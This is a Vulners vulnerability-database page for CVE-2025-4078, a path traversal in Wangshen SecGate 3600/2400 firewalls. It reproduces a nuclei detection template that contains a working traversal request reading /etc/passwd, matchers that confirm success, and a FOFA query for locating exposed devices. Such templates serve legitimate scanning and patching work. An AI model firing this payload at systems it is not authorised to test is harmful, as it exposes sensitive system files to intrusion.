Lucene search
K

Wangshen SecGate 3600 Path Traversal Vulnerability

๐Ÿ—“๏ธย 30 Apr 2026ย 05:10:47Reported byย ProjectDiscoveryTypeย 
nuclei
ย nuclei
๐Ÿ”—ย github.com๐Ÿ‘ย 6ย Views

Wangshen SecGate 3600/2400 path traversal via file_name in log_export_file enables remote arbitrary file access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-4078
29 Apr 202520:12
โ€“circl
CNNVD
Wangshen SecGate ่ทฏๅพ„้ๅކๆผๆดž
29 Apr 202500:00
โ€“cnnvd
CVE
CVE-2025-4078
29 Apr 202520:08
โ€“cve
Cvelist
CVE-2025-4078 Wangshen SecGate 3600 g=log_export_file path traversal
29 Apr 202520:08
โ€“cvelist
EUVD
EUVD-2025-12666
3 Oct 202520:07
โ€“euvd
Fedora
[SECURITY] Fedora 42 Update: bind-9.18.41-1.fc42
30 Oct 202504:36
โ€“fedora
Fedora
[SECURITY] Fedora 43 Update: bind-9.18.41-1.fc43
8 Nov 202501:10
โ€“fedora
Fedora
[SECURITY] Fedora 41 Update: bind-9.18.41-1.fc41
30 Oct 202504:20
โ€“fedora
NVD
CVE-2025-4078
29 Apr 202520:15
โ€“nvd
Positive Technologies
PT-2025-18206
29 Apr 202500:00
โ€“ptsecurity
Rows per page
id: CVE-2025-4078

info:
  name: Wangshen SecGate 3600 Path Traversal Vulnerability
  author: Ark
  severity: medium
  description: |
    Wangshen SecGate 3600 2400 contains a path traversal caused by manipulation of the 'file_name' argument in '?g=log_export_file', letting remote attackers access arbitrary files, exploit requires remote access.
  impact: |
    Remote attackers can access sensitive files on the system, potentially leading to information disclosure or system compromise.
  remediation: |
    Implement input validation and sanitize 'file_name' parameter; update to the latest firmware version if available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4078
    - https://vuldb.com/?id.295954
  metadata:
    verified: true
    max-request: 1
    fofa-query: fid="1Lh1LHi6yfkhiO83I59AYg=="
  tags: cve,cve2025,wangshen,lfi,traversal,vuln,vkev

http:
  - raw:
      - |
        GET /?g=log_export_file&file_name=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("root:.*:0:0:", body)'
          - 'contains(content_type, "text/plain")'
        condition: and
# digest: 4a0a00473045022070b5b6da441274110c1174616e4ba757035a6e1696f87d767b092422cf4d5c31022100dcb56ce766c049a248f6a472412404fe0701a12353e8953459f0f3ba2a0e705d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2026 09:38Current
4.9Medium risk
Vulners AI Score4.9
CVSS 24
CVSS 3.14.3
CVSS 45.3
CVSS 34.3
EPSS0.00966
SSVC
6